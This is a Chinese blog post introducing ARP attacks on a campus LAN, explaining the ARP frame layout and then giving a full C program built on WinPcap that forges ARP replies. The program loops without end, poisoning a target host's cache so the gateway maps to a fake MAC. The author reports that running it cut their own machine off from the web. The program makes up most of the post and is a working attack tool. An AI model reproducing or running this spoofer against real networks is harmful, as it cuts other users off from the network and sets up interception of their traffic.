初探ARP攻击

最新推荐文章于 2021-09-28 00:25:45 发布
最新推荐文章于 2021-09-28 00:25:45 发布
阅读量1.1k 收藏
点赞数
分类专栏: TeamSourcing Study Step By Step 文章标签: header buffer dst 浏览器 list null
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/vlirqin/article/details/3686908
版权

    学校里是局域网,而且过上十天半个月就会有ARP攻击泛滥。最一开始并不知道什么是ARP,知道ARP后还是不知道什么是ARP攻击。今天看了一个教程,了解了常规的ARP攻击的的方法。从协议报文外看其实就是发送修改后的报文使目的机器找不到上网的连接,局域网大都是通过网关上网的,IP不是唯一的,但MAC网卡地址是全球唯一的,所以把目的地址的ARP缓存中的网关的MAC地址修改成错误的MAC地址,目的机器就找不到网关也就不能上网了。

    掌握各种协议报文很有必要,但在这里大概提一下ARP协议报文结构:

    一个完整的ARP报文由三部分组成:ARP头 物理帧和ARP帧。

   物理帧由:接收方MAC(6bytes),发送方MAC(6bytes)和以太网类型(0x0806)

   ARP帖由:硬件类型,上层协议类型(2),MAC地址长度(2),IP地址长度(1),操作码(2),

                    发方MAC(6),发方端口(4),收方MAC(6),收方端口(4),填充数据(18)

  

   此程序用到了WinpCap软件源库packet.lib和头文件packet32.h,调用了一些方法可以直接从网卡里读取数据报文。

  1. #include "winsock2.h"
  2. #include "Packet32.h"
  3. #include "stdio.h"
  4. #include "Iphlpapi.h"
  6. #pragma comment(lib, "packet.lib")
  7. #pragma comment(lib, "ws2_32.lib")
  8. #pragma comment(lib,"iphlpapi.lib")
  11. #define NDIS_PACKET_TYPE_DIRECTED 0x0001 //直接模式
  13. #pragma pack(push, 1)
  15. //以太网物理帧头部
  16. typedef struct _et_header    
  17. {
  18.     unsigned char   eh_dst[6];  
  19.     unsigned char   eh_src[6];
  20.     unsigned short  eh_type;
  21. }ET_HEADER;
  23. //ARP帧头部
  24. typedef struct _arp_header   
  25. {
  26.     unsigned short  arp_hdr;
  27.     unsigned short  arp_pro;
  28.     unsigned char   arp_hln;
  29.     unsigned char   arp_pln;
  30.     unsigned short  arp_opt;
  31.     unsigned char   arp_sha[6];
  32.     unsigned long   arp_spa;
  33.     unsigned char   arp_tha[6];
  34.     unsigned long   arp_tpa;
  35. }ARP_HEADER;
  37. //将被传递到监听线程的信息结构
  38. typedef struct info     
  39. {
  40.     LPADAPTER   lpAdapter;
  41.     char        localIP[20];
  42.     char        simulateIP[20];
  43.     char        targetIP[20];
  44. }INFO;
  46. // 网卡信息
  47. typedef struct tagAdapterInfo          
  48. {
  49.       char  szDeviceName[128];           // 名字
  50.       char  szIPAddrStr[16];             // IP
  51.       char  szHWAddrStr[18];             // MAC
  52.       DWORD dwIndex;                    // 编号          
  53. }INFO_ADAPTER, *PINFO_ADAPTER;
  54. //
  55. INFO_ADAPTER infoAdapterList[10];
  57. #pragma pack(pop)
  59. //IP报头部
  60. typedef struct _ip_header
  61. {
  62.     unsigned char   h_verlen;   //4位IP版本号+4位首部长度
  63.     unsigned char   tos;        //8位服务类型TOS
  64.     unsigned short  total_len;  //16位总长度(字节)
  65.     unsigned short  ident;      //16位标识
  66.     unsigned short  frag_and_flags; //3位标志位+13位分段偏移量
  67.     unsigned char   ttl;        //8位生存时间 TTL
  68.     unsigned char   proto;      //8位协议 (TCP, UDP 或其他)
  69.     unsigned short  checksum;   //16位IP首部校验和
  70.     unsigned int    sourceIP;   //32位源IP地址
  71.     unsigned int    destIP;     //32位目的IP地址
  72. }IP_HEADER;
  74. void usage()
  75. {
  76.     printf("Name : Richard/r/n");
  77.     printf("MSN  : hdqu@hotmail.com/r/n");
  78.     printf("Usage: ARPSender targetIP simuIP fakeMAC/r/n/r/n");
  79. }
  81. int GetLocalAdapterList()
  82. {
  83.     char                tempChar;
  84.     ULONG               uListSize=1;
  85.     PIP_ADAPTER_INFO    pAdapter;           // 定义PIP_ADAPTER_INFO结构存储网卡信息
  86.     int                 nAdapterIndex = 0;
  87.     
  88.     //获得网卡列表信息串长度
  89.     DWORD   dwRet = GetAdaptersInfo((PIP_ADAPTER_INFO)&tempChar, &uListSize);
  90.     printf("/r/nTry to get adapter list.../r/n");
  91.     if (dwRet == ERROR_BUFFER_OVERFLOW)
  92.     {
  93.         PIP_ADAPTER_INFO pAdapterListBuffer = (PIP_ADAPTER_INFO) new (char[uListSize]);
  94.         dwRet = GetAdaptersInfo(pAdapterListBuffer, &uListSize);
  95.         if (dwRet == ERROR_SUCCESS)
  96.         {
  97.             pAdapter = pAdapterListBuffer;
  98.             // 枚举网卡然后将相关条目添加到List中
  99.             while (pAdapter)      
  100.             {
  101.                 // 网卡名字
  102.                 char strTemp[128];
  103.                 strcpy(strTemp, "//Device//NPF_");                     
  104.                 strcat(strTemp, pAdapter->AdapterName);                        // 加上前缀              
  105.                 strcpy(infoAdapterList[nAdapterIndex].szDeviceName,strTemp);
  106.                 // IP
  107.                 strcpy(infoAdapterList[nAdapterIndex].szIPAddrStr,pAdapter->IpAddressList.IpAddress.String );
  108.                 // MAC
  109.                 sprintf( infoAdapterList[nAdapterIndex].szHWAddrStr, "%02x%02x%02x%02x%02x%02x", /
  110.                     pAdapter->Address[0],pAdapter->Address[1],pAdapter->Address[2], /
  111.                    pAdapter->Address[3],pAdapter->Address[4],pAdapter->Address[5]);
  112.                 // 网卡编号
  113.                 infoAdapterList[nAdapterIndex].dwIndex = pAdapter->Index;          
  114.                 pAdapter = pAdapter->Next;
  115.                 nAdapterIndex ++;
  116.             }
  117.             delete pAdapterListBuffer;
  118.         }
  119.         return nAdapterIndex;
  120.     }
  121.     return 0;
  122. }
  124. void StrToMac(char *str,unsigned char *mac)  //自定义的将字符串转换成mac地址的函数
  125. {
  126.     char *str1;
  127.     int i;
  128.     int low,high;
  129.     char temp;
  131.     for(i=0;i<6;i++)
  132.     {
  133.         str1=str+1;
  134.         switch(*str)
  135.         {
  136.         case 'a':high=10;
  137.             break;
  138.         case 'b':high=11;
  139.             break;
  140.             case 'c':high=12;
  141.             break;
  142.             case 'd':high=13;
  143.             break;
  144.         case 'e':high=14;
  145.             break;
  146.         case 'f':high=15;
  147.             break;
  148.         default:temp=*str;
  149.            high=atoi(&temp);
  150.         }
  151.         switch(*str1)
  152.         {
  153.         case 'a':low=10;
  154.             break;
  155.         case 'b':low=11;
  156.             break;
  157.             case 'c':low=12;
  158.             break;
  159.             case 'd':low=13;
  160.             break;
  161.         case 'e':low=14;
  162.             break;
  163.         case 'f':low=15;
  164.             break;
  165.         default:temp=*str1;
  166.            low=atoi(&temp); 
  167.         }
  168.         mac[i]=high*16+low;
  169.         str+=2;
  170.     }
  171. }
  173. bool GetRemoteMac(unsigned char *remoteMac,char *remoteIP)            //获取远程主机MAC地址
  174. {
  175.     WSADATA wsaData;
  176.     ULONG remoteAddr=0,macAddrLen=6;
  177.     unsigned char remoteMacTemp[6]={0}; 
  179.     if(WSAStartup(MAKEWORD(2,1), &wsaData)!=0)
  180.     {
  181.         printf("WSAStartup error!/n");
  182.         return FALSE;
  183.     }
  185.     remoteAddr=inet_addr(remoteIP);
  186.     if(SendARP(remoteAddr, (unsigned long)NULL,(PULONG)&remoteMacTemp, &macAddrLen)!=NO_ERROR)
  187.     {
  188.         printf("Get remote MAC failed!/n");
  189.         return FALSE;
  190.     }
  191.     memcpy(remoteMac,remoteMacTemp,6);
  192.     
  194.     printf("Remote IP: %s   MAC: ", remoteIP);
  195.     for(int i=0; i<6; i++ )
  196.     {
  197.         printf( "%.2x", remoteMac[i] );
  198.     }
  199.     printf("/r/n");
  201.     return TRUE;
  202. }
  205. int main(int argc, char* argv[])
  206. {
  207.     LPADAPTER       lpAdapter;
  208.     LPPACKET        lpPacket;
  209.     ET_HEADER       et_header;
  210.     ARP_HEADER      arp_header;
  211.     char            buffer[512]={0};
  212.     INFO            param={0};
  213.     int             index = 0;
  214.     int             adaptercount = 0;
  216.     usage();
  218.     /*if(argc != 4)
  219.     {
  220.         return -1;
  221.     }*/
  223.     unsigned char remoteMac[6] = {0};
  224.     unsigned char fakeMac[6]   = {0};
  226.     //获取目标真实MAC地址
  227.     if(GetRemoteMac(remoteMac, "10.1.16.103"/*argv[1]*/) == FALSE)
  228.     {
  229.         return -1;
  230.     }
  231.     
  232.     //获得适配器列表
  233.     adaptercount = GetLocalAdapterList();
  234.     
  235.     //通过转换得到用户输入的虚假MAC地址
  236.     StrToMac(/*argv[3]*/"222222222222", fakeMac);
  237.     
  238.     for(int i = 0; i< adaptercount; i++)
  239.         printf("%d: %s: %s/n/n",i,infoAdapterList[i].szIPAddrStr,infoAdapterList[i].szDeviceName);
  240.     
  241.     printf("Select a working adapter by number:");
  243.     while(TRUE)
  244.     {
  245.         scanf("%d",&index);
  246.         if(index >= 0 && index < adaptercount) break;
  247.     }
  249.     //打开适配器
  250.     lpAdapter=(LPADAPTER)PacketOpenAdapter((LPTSTR)infoAdapterList[index].szDeviceName); 
  253.     if (!lpAdapter||(lpAdapter->hFile==INVALID_HANDLE_VALUE))
  254.     {
  255.         printf("Unable to open the driver, Error Code : %lx/n", GetLastError());
  256.         return -1;
  257.     } 
  259.     //伪造ARP应答包
  260.     memcpy(et_header.eh_src, fakeMac,   6);
  261.     memcpy(et_header.eh_dst, remoteMac, 6);
  263.     et_header.eh_type=htons(0x0806);  //类型为0x0806表示这是ARP包
  265.     arp_header.arp_hdr=htons(0x0001);  //硬件地址类型以太网地址
  266.     arp_header.arp_pro=htons(0x0800);  //协议地址类型为IP协议
  267.     arp_header.arp_hln=0x06;           //硬件地址长度为6
  268.     arp_header.arp_pln=0x04;           //协议地址长度为4
  269.     arp_header.arp_opt=htons(0x0002);  //标识为ARP应答
  271.     arp_header.arp_spa=inet_addr(/*argv[2]*/"10.1.19.254");  //source_ip
  272.     memcpy(arp_header.arp_sha,et_header.eh_src,6);
  273.     arp_header.arp_tpa=inet_addr(/*argv[1]*/"10.1.16.103");  //target_ip
  274.     memcpy(arp_header.arp_tha,et_header.eh_dst,6);
  276.     memcpy(buffer,&et_header,sizeof(ET_HEADER));
  277.     memcpy(buffer+sizeof(ET_HEADER),&arp_header,sizeof(ARP_HEADER));
  279.     //给PACKET结构指针分配内存
  280.     lpPacket=PacketAllocatePacket();     
  282.     //初始化PACKET结构指针
  283.     PacketInitPacket(lpPacket,buffer,64);   
  284.             
  285.     //设置发送次数
  286.     if(PacketSetNumWrites(lpAdapter, 2) == FALSE)   
  287.     {
  288.         printf("warning: Unable to send more than one packet in a single write!/n");
  289.     }
  291.     //不断发送伪造的ARP应答包欺骗目标主机
  292.     while(TRUE)
  293.     {
  294.         struct in_addr sAddr, tAddr;
  295.         sAddr.S_un.S_addr = arp_header.arp_spa;
  296.         tAddr.S_un.S_addr = arp_header.arp_tpa;
  298.         printf("send fake %s:%02x-%02x-%02x-%02x-%02x-%02x ", /
  299.             inet_ntoa(sAddr), /
  300.             fakeMac[0], fakeMac[1], fakeMac[2], fakeMac[3], fakeMac[4], fakeMac[5]);
  301.         printf("to %s:%02x-%02x-%02x-%02x-%02x-%02x/r/n"
  302.             inet_ntoa(tAddr), /
  303.             remoteMac[0], remoteMac[1], remoteMac[2], remoteMac[3], remoteMac[4], remoteMac[5]);
  304.         if(PacketSendPacket(lpAdapter,lpPacket,TRUE) == FALSE) 
  305.         {
  306.             printf("Error sending the packets!/n");
  307.             break;
  308.         }
  309.         Sleep(2000);
  310.     }
  312.     PacketFreePacket(lpPacket);   //释放PACKET结构指针
  314.     PacketCloseAdapter(lpAdapter);  //关闭适配器
  316.     return 0;
  317. }

   程序攻击本地机器使用cmd-->arp -a 查看 10.1.19.254对应的MAC的地址改成了自定义的22-22-22-22-22-22,打开浏览器输入网址打不开链接,但刷新ARP缓存时我看到有时10.1.19.254对应的MAC地址会改成正确的,应该是网关一直在广播ARP报文,而本地程序具有一定的时间延迟,所以造成网络有时可以缓慢的打开一些网页。

萨斯特的风
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
基于winpcap的mfc arp欺骗
11-04
相比于之前的arp欺骗程序 修正了程序堆栈溢出的问题,添加了winpcap开发库,自动获取往电脑设置的网关(只需修改适配器名称),并且可以在网卡列表选择指定网卡发送数据包
基于MFC的ARP发送
03-29
应用WIncap对ARP包进行封装,发送
ARP攻击模拟工具 第一代
10-13
实现模拟以太网的ARP欺骗攻击和IP地址冲突攻击。 此为本人早期作品,固比较简陋和不完善,漏洞及错误之处可能较多请多多包涵! 开发环境为vs2005 + winpcap 4.0.2 编译需要导入winpcap 4.0.2 lib库 使用之前需安装winpcap4.0.2驱动 包含程序及源码
基于ARP的局域网IP劫持——C语言实现
多媒体编程、网络编程、系统编程、网络安全编程、驱动编程
08-08 3005
150 printf("success: device: %s\n", devStr); 151 } 152 else 153 { 154 printf("error: %s\n", errBuf); 155 exit(1); 156 } 157 158 /* open a device, wait until a packet arrives *
ARP攻击初探
xiaobai的博客
04-16 230
@ARP攻击初探 第一步思路 1.攻击指定的IP实现断网——ARP 2.原理:通过扫描当前攻击机的IP地址,得到内网的所有IP所在网关 3.组成ARP数据包,对网关内的主机先发起ping,寻找到存活的主机 4.获得存活主机列表,选择需要攻击的ip,发起攻击 步骤 获得当前的IP及网关route print 封装ARP数据包,以太网的包结构形式来发起ping,得到存活主机列表 得到存活主机列表 选...
Dennis的ARP初探第三篇--再谈ARP攻击时,面对的不仅是技术
weixin_34203426的博客
11-07 57
前日,在培训课堂上,当讲师谈起ARP攻击的时候,很多学员都非常的兴奋,纷纷询问如何解决,有什么样的技术解决是最好的。 当然了,提出的方法很多,病毒查杀,交换机上做设置等等。 当然了,在我看来,这些技术是非常的好了。抓包啊,设置啊什么的,我是不会了。 而我关注的是:在结局问题的时候,是应该显示自己的技术高超呢,还是迅速的解决问题呢? 这里,应该有人会想,肯...
乖乖小网安-网络安全之ARP初探
qq_44256371的博客
09-28 1949
大学方向有很多不确定,朝着兴趣方面硬干… 文章目录一、网络安全实验室拓扑搭建二、ARP欺骗攻击原理与实战 实验环境: 主机:mac OS 虚拟机软件:VMware Fusion 12.1.2 (17964953) 安装系统:win server 2003、win xp 网卡模式:NET模式 上网环境:内网互相能ping通外网可以上网 一、网络安全实验室拓扑搭建 #arp -a,查询系统中缓存的ARP表。ARP表用来维护IP地址与MAC地址的一一对应。 arp -a 二、ARP欺骗攻击原理与实战
初探 Ettercap: ARP投毒 && DNS欺骗
梦想专栏
08-05 3795
笔记一:ettercap是什么? 我们在对WEB安全检测的时候都会用到Cain和netfuke这两款工具,功能相信用过的朋友多多少少都知道,但这两款工具是在windows下运行的。 而ettercap是在linux下运行的 。其实功能都是差不多的,我称呼它为嗅探工具,ARP欺骗,DNS,劫持,中间人攻击等等。总之这是一款强大的安全测试工具。 笔记二:DNS简单说明 了解DNS是什么:Dom...
《网络安全技术》实验教学改革初探.docx
01-21
1. **ARP欺骗实验**:通过构造ARP欺骗报文,实现中间人攻击,模拟网络嗅探过程,从而破坏数据传输的保密性。 2. **攻击防范方案**:从不同角度出发,设计防范ARP欺骗攻击的方法,如静态绑定ARP缓存、配置HTTPS实现...
[网络安全自学篇] 七十八.XSS跨站脚本攻击案例分享及总结(二)
杨秀璋的专栏
05-18 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了肖老师(Seak)的分享,介绍恶意代码与APT攻击中的武器,包括A2PT的攻击武器、普通APT组织的自研恶意代码、商用恶意代码、无恶意代码作业、开源和免费工具等。这些天分享了很多系统安全和软件安全的知识,接下来让我们回归网络安全,做做XSS跨站脚本攻击案例。这些题目来自Fox好友,在此感谢他。主要内容包括XSS原理、不同类型的XSS、XSS靶场9道题目、如何防御XSS。希望您喜欢~
[网络安全自学篇] 二十五.Web安全学习路线及木马、病毒和防御初探
热门推荐
杨秀璋的专栏
11-12 3万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了分享机器学习在安全领域的应用,并复现一个基于机器学习(逻辑回归)的恶意请求识别。这篇文章简单叙述了Web安全学习路线,并实现了最简单的木马和病毒代码,希望对读者有所帮助。
kali连接蓝牙_蓝牙攻击指南(kali)
weixin_39805924的博客
12-22 4882
基本操作hciconfig 查看蓝牙设备信息hcitool:这是一个查询工具。 可以用来查询设备名称,设备ID,设备类别和设备时钟。hcidump:可以使用这个来嗅探蓝牙通信hciconfig hci0 up 启动蓝牙设备hciconfig hci0 down 关闭蓝牙设备service bluetooth start 启动蓝牙服务bluetoothctl 蓝牙控制台错误 Failed to pa...
初探IPv4与IPv6:它们对github访问有何影响
# 1. 介绍IPv4和IPv6 - ## 1.1 什么是IPv4 - ### 1.1.1 IPv4的定义 IPv4是Internet Protocol Version 4的简称,是互联网使用最广泛的协议之一。 - ### 1.1.2 IPv4的特点 IPv4地址由32位二进制数组成,共4个字节...
ARP攻击及实现详解
mxway的专栏
03-26 8994
声明:本文只用于技术交流和学习使用,严禁用于任何其它用途,严禁转载。若因本文带来的任何麻烦,本人不承担任何连带责任。 一、ARP协议 关于arp协议作用就不再这里多说了,直接看下图 图1 上图来源于TCP-IP协议详解卷1的图4-3 图1中以太网目的地址,以太网源地址,发送端以太地址,发送端IP地址,目的以太网地址,目的IP地址这几个字段的含义很明显。主要看剩下几个字段的取值用途是什
【WinPcap】自制抓包+分析+ARP攻击(三)
猫和鱼爪的鸟窝
04-23 3755
【WinPcap】自制抓包+分析+ARP攻击 扫描网内主机       继续接着昨天的来,今天就能搞定。           先来看一下对网内活动主机的扫描。我的大体思路是:对网段内所有IP发送ARP包,根据收到的响应来判断是否有活动主机,并作记录。这一点其实不难,仔细认真地遍历网段内主机IP,用一个线程额外接受ARPreply响应包,并做解析就可以了。我觉得难就难在网关的确定,子网掩码
ARP网关欺骗原理及解决办法
小米的修行之路
06-24 1万+
一.什么是ARP协议? ARP协议是“Address Resolution Protocol”(地址解析协议)的缩写。在局域网中,网络中实际传输的是“帧”,帧里面是有目标主机的MAC地址的。在以太网中,一个主机要和另一个主机进行直接通信,必须要知道目标主机的MAC地址。但这个目标主机的MAC地址是如何获得的呢?它就是通过地址解析协议获得的。所谓“地址解析”就是主机在发送帧前将目标IP地址转换成目标...
使用ICMP协议绕过防火墙拦截
三两四钱
01-02 5562
    通常防火墙默认是允许用户使用Ping一个网络地址的,而我们知道Ping的过程其实是发送和接收ICMP报文的过程。我们看一下ICMP报文结构:                   ICMP 8  |  代码 8                    校    验    和    16                  标    识    符    16          
nginx架构初探:多进程模型与进程管理
nginx平台初探 Nginx 是一个高性能的 Web 服务器, Proxy 服务器,缓存服务器和负载均衡器。其高性能与其架构是分不开的。那么 Nginx 究竟是怎么样的呢?下面我们来初识一下 Nginx 框架。 **Nginx 架构** Nginx ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值